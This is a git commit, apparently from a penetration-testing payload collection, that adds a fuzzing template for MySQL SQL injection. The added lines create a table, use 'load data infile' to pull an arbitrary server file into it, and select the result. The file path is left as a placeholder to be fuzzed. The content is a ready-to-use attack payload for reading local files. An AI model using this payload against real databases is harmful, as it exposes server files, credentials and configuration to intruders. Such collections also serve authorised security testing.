Architecture - Files/Intruder/Images and README + template

This commit is contained in:
Swissky
2018-12-23 00:45:45 +01:00
parent e096d10a30
commit b4aff1a826
53 changed files with 133 additions and 29 deletions

View File

@@ -0,0 +1,3 @@
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;